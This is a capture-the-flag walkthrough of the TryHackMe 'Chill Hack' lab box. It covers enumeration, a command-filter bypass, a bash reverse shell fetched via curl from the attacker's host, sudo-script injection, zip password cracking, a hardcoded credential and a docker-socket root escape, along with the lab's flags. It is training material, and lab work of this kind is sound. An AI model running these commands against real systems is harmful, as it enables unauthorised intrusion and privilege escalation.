In this walk through, we will be going through the Chill Hack from Tryhackme. This room is rated as easy on the platform however it will definitely challenge your basics and might throw you into a rabbit hole. In a nutshell, this room will test your enumeration skills and how well you can bypass input blacklisting and validation. Along with that it will challenge you in some system exploration and privilege escalation stuff. So on that note, let’s get started.
Machine Info:
Title | Chill Hack |
IP address | 10.10.253.182 |
Difficulty | Easy |
Objective | Chill the Hack out of the Machine. |
Phase 1 – Enumeration
- First checking if machine is live or not by pinging it.
- Started with the regular nmap scan with “-sS” and “-sV” flag. Found three common ports and services open – 21 (FTP), 22 (SSH) and 80 (HTTP).
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.253.182 Nmap scan report for 10.10.253.182 Host is up (0.18s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds
- I started with FTP first, tried anonymous login on the server. Got success and found a note. Further downloaded it to the local machine, reveals potential username.
wh1terose@fsociety:~$ ftp 10.10.253.182 Connected to 10.10.253.182. 220 (vsFTPd 3.0.3) Name (10.10.253.182:wh1terose): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt 226 Directory send OK. ftp> get note.txt local: note.txt remote: note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note.txt (90 bytes). 226 Transfer complete. 90 bytes received in 0.00 secs (45.8719 kB/s) ftp> exit 221 Goodbye.
- Next i moved to another port that is 80 (HTTP). Started off by firing gobuster on it to reveal some juicy end points. Got something similar to my expectation, a secret directory literally called “secret”.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.253.182/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.253.182/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/04/30 11:51:35 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /css (Status: 301) [Size: 312] [--> http://10.10.253.182/css/] /fonts (Status: 301) [Size: 314] [--> http://10.10.253.182/fonts/] /images (Status: 301) [Size: 315] [--> http://10.10.253.182/images/] /index.html (Status: 200) [Size: 35184] /js (Status: 301) [Size: 311] [--> http://10.10.253.182/js/] /secret (Status: 301) [Size: 315] [--> http://10.10.253.182/secret/] /server-status (Status: 403) [Size: 278] =============================================================== 2023/04/30 11:53:03 Finished ===============================================================
- The secret directory contains a search field which allows us to execute command on the underlying server however the input was filtered and only some commands was whitelisted. I tried “ls” which got “blocked” then i tried “pwd” and it worked.
Phase 2 – Initial Access
- Next i tried various commands that i can work with but to be honest, i was banging my head against the wall for a while on this. Moving on, i found out that i can bypass the restriction on “ls” by typing it a forward slash. Plus, the restricted commands output can be seen in the source code.
l\s -la
- As per the list there is no limitation on any of the commands which can be used to download stuff off the web like wget or curl. So, i used the below given one liner reverse shell to execute with the help of curl command to get the initial entry into the machine.
#bash reverse shell bash -i >& /dev/tcp/10.18.11.103/4444 0>&1 # Execute the shell using curl command curl 10.18.11.103:8000/shell.sh | ba\sh
Phase 3 – Further exploitation & exploration
- Once i got my initial shell, i tried to list the sudo configurations of the machine for the users. Found that a script called helpline.sh can be executed by user apaar.
www-data@ubuntu:/var/www/html/secret$ sudo -l sudo -l Matching Defaults entries for www-data on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ubuntu: (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh www-data@ubuntu:/var/www/html/secret$
- Peeking into the script to get an understanding what it is doing. The variable $msg in the end except an input, which we will exploit later. But at first let’s stabilize our shell.
www-data@ubuntu:/var/www/html/secret$ cat /home/apaar/.helpline.sh cat /home/apaar/.helpline.sh #!/bin/bash echo echo "Welcome to helpdesk. Feel free to talk to anyone at any time!" echo read -p "Enter the person whom you want to talk with: " person read -p "Hello user! I am $person, Please enter your message: " msg $msg 2>/dev/null echo "Thank you for your precious time!" www-data@ubuntu:/var/www/html/secret$
- Upgrading shell to full tty.
www-data@ubuntu:/var/www/html/secret$ python3 -c 'import pty;pty.spawn("/bin/bash")' <ret$ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@ubuntu:/var/www/html/secret$ ^Z [1]+ Stopped nc -lvnp 4444 wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ stty raw -echo;fg nc -lvnp 4444 www-data@ubuntu:/var/www/html/secret$ stty rows 29 columns 126 www-data@ubuntu:/var/www/html/secret$ export TERM=success www-data@ubuntu:/var/www/html/secret$
- Now we will exploit that variable ($msg) to get a shell and finally get our user flag.
www-data@ubuntu:/var/www/html/secret$ sudo -u apaar /home/apaar/.helpline.sh Welcome to helpdesk. Feel free to talk to anyone at any time! Enter the person whom you want to talk with: ian Hello user! I am ian, Please enter your message: /bin/bash python3 -c 'import pty;pty.spawn("/bin/bash")' apaar@ubuntu:/var/www/html/secret$ ls images index.php apaar@ubuntu:/var/www/html/secret$ cat /home/apaar/local.txt {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww} apaar@ubuntu:/var/www/html/secret$
Phase 4 – Privilege Escalation
- Earlier a port was missed to capture that was eventually open – 8000. In there i found an image which was downloaded and then used steghide to extract the hidden data. The hidden data reveals a zip file but it was password protected. So, i used john to crack the zip file password. Post getting the password of the zip file reveals a source code.
#Getting the image file from the server. wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ wget http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg --2023-04-30 13:43:02-- http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg Connecting to 10.10.251.210:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 68841 (67K) [image/jpeg] Saving to: ‘hacker-with-laptop_23-2147985341.jpg’ hacker-with-laptop_2 100%[====================>] 67.23K 41.6KB/s in 1.6s 2023-04-30 13:43:04 (41.6 KB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841] #Extracting data with steghide. wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ steghide --extract -sf hacker-with-laptop_23-2147985341.jpg Enter passphrase: wrote extracted data to "backup.zip". wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ unzip backup.zip Archive: backup.zip [backup.zip] source_code.php password: skipping: source_code.php incorrect password #Using john to crack the password of the zip file. wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/zip2john backup.zip > crack.txt ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8 wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/john crack.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 8 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. 0g 0:00:00:00 DONE 1/3 (2023-04-30 13:46) 0g/s 1340Kp/s 1340Kc/s 1340KC/s Phpsource1900..Pcode1900 Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst Enabling duplicate candidate password suppressor pass1word (backup.zip/source_code.php) 1g 0:00:00:00 DONE 2/3 (2023-04-30 13:46) 7.142g/s 595814p/s 595814c/s 595814C/s 123456..abundance Use the "--show" option to display all of the cracked passwords reliably Session completed.
- Taking a dive into the source code, we can see that a password is encoded for the user – Anurodh. You know where it is going now.
<html> <head> Admin Portal </head> <title> Site Under Development ... </title> <body> <form method="POST"> Username: <input type="text" name="name" placeholder="username"><br><br> Email: <input type="email" name="email" placeholder="email"><br><br> Password: <input type="password" name="password" placeholder="password"> <input type="submit" name="submit" value="Submit"> </form> <?php if(isset($_POST['submit'])) { $email = $_POST["email"]; $password = $_POST["password"]; if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==") { $random = rand(1000,9999);?><br><br><br> <form method="POST"> Enter the OTP: <input type="number" name="otp"> <input type="submit" name="submitOtp" value="Submit"> </form> <?php mail($email,"OTP for authentication",$random); if(isset($_POST["submitOtp"])) { $otp = $_POST["otp"]; if($otp == $random) { echo "Welcome Anurodh!"; header("Location: authenticated.php"); } else { echo "Invalid OTP"; } } } else { echo "Invalid Username or Password"; } } ?> </html>
- Used Cyberchef to decode the encoded password. I found – !d0ntKn0wmYp@ssw0rd
- With the new username and password found, we log into the SSH server to get ahead in our privilege escalation journey for this box.
- To get root shell and flag, i exploited the docker instance with a one-liner from GTFObins.
anurodh@ubuntu:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash Unable to find image 'ubuntu:latest' locally docker: Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers). See 'docker run --help'. anurodh@ubuntu:~$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE alpine latest a24bb4013296 2 years ago 5.57MB hello-world latest bf756fb1ae65 3 years ago 13.3kB anurodh@ubuntu:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash groups: cannot find name for group ID 11 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. root@fd09d321605c:/# cd /root root@fd09d321605c:~# ls proof.txt root@fd09d321605c:~# cat proof.txt {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg} Congratulations! You have successfully completed the challenge. ,-.-. ,----. _,.---._ .-._ ,----. ,-..-.-./ \==\ ,-.--` , \ _.-. _.-. _,..---._ ,-.' , - `. /==/ \ .-._ ,-.--` , \ |, \=/\=|- |==||==|- _.-` .-,.'| .-,.'| /==/, - \ /==/_, , - \|==|, \/ /, /==|- _.-` |- |/ |/ , /==/|==| `.-.|==|, | |==|, | |==| _ _\==| .=. |==|- \| ||==| `.-. \, , _|==/==/_ , /|==|- | |==|- | |==| .=. |==|_ : ;=: - |==| , | -/==/_ , / | - - , |==|==| .-' |==|, | |==|, | |==|,| | -|==| , '=' |==| - _ |==| .-' \ , - /==/|==|_ ,`-._|==|- `-._|==|- `-._ |==| '=' /\==\ - ,_ /|==| /\ , |==|_ ,`-._ |- /\ /==/ /==/ , //==/ - , ,/==/ - , ,/ |==|-, _`/ '.='. - .' /==/, | |- /==/ , / `--` `--` `--`-----`` `--`-----'`--`-----' `-.`.____.' `--`--'' `--`./ `--`--`-----`` --------------------------------------------Designed By ------------------------------------------------------- | Anurodh Acharya | --------------------- Let me know if you liked it. Twitter - @acharya_anurodh Linkedin - www.linkedin.com/in/anurodh-acharya-b1937116a root@fd09d321605c:~#
Also Read: Tryhackme – Burpsuite: The Basics
Conclusion:
So that was “Chill Hack” for you. Trust me, it wasn’t chill for me. I mean, it was meant to be an easy box however at some point of time, it makes me just roam around the circles. Summing it up, we first started with our nmap scan. Found our regular FTP, SSH and HTTP opened. Started first with the FTP, used anonymous login to get the note.txt file which reveal some potential usernames. Further, on the web part, used gobuster to reveal a secret directory which holds a command field which can be used to execute commands on the underlying operating system. Abusing it with curl, we got our initial access. Moving on and checking the sudo configurations, reveals a script that can be executed by the user apaar. We stabilize the shell and exploited the script to get our shell as the user apaar. Further, we missed a port 8000 which was running an additional server that holds an image file. Downloading the file and getting its hidden content with steghide reveals a backup.zip file. Next, we used john to crack the password of the zip file. The zip contains source code that has hard coded password for user anurodh. Decoding the password and using it to gain additional access using SSH. Finally, exploited docker instance misconfiguration to get the root flag and my old forgotten nudes.